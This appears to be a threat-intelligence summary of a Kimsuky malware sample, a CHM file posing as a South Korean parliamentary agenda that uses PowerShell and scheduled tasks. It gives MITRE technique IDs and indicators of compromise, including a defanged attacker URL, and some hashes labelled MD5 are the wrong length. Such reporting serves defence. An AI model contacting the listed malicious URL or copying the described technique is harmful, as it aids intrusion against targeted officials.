Researchers attribute the sample to the North Korean hacking group Kimsuky, who used a CHM file masquerading as a parliamentary meeting agenda to target South Korean officials and aides. It employs PowerShell to download and execute additional payloads and establishes persistence via scheduled tasks. #Kimsuky #240903
Keypoints
- The malware is named “240903-회국회(정) 제1차 전체회의 의사일정안”.
- It is a CHM file that exploits vulnerabilities to execute malicious code.
- The malware targets South Korean lawmakers and their aides.
- It uses PowerShell to create scheduled tasks for executing the malware.
- Security vendors have detected this malware under various names.
- The article warns about the limitations of antivirus programs in detecting such threats.
MITRE Techniques
- [T1059.001] PowerShell – “PowerShell commands are executed to download and run malicious files.”
- [T1053.005] Scheduled Task – “Scheduled tasks are created to ensure the malware runs at specified intervals.”
- [T1071.001] Web Protocols – “Malware communicates with external servers to receive commands.”
Indicators of Compromise
- [File Name] 240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고).chm – MD5: f5f5a585a12df9cb406dde6b3e6da23d; SHA-1: e7197bb5c5363b56a1e33f333e6613f319458d77; SHA-256: 3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
- [File Name] Helpstore.exe – MD5: 86ef578ca5923119e65049f3d26bff7ea41cea12f8c425f06786b406c8dfaf9a
- [File Name] index.html – MD5: f00852dab6c6540bb6700d4e6ec43d6b61cd149ac395900b8b9eb5670a0be373
- [URL] hxxp://checker.jetos.com/l/siCTlD – iframe loads an external URL to fetch additional content/commands (obfuscated in the page)
Read more: https://wezard4u.tistory.com/429252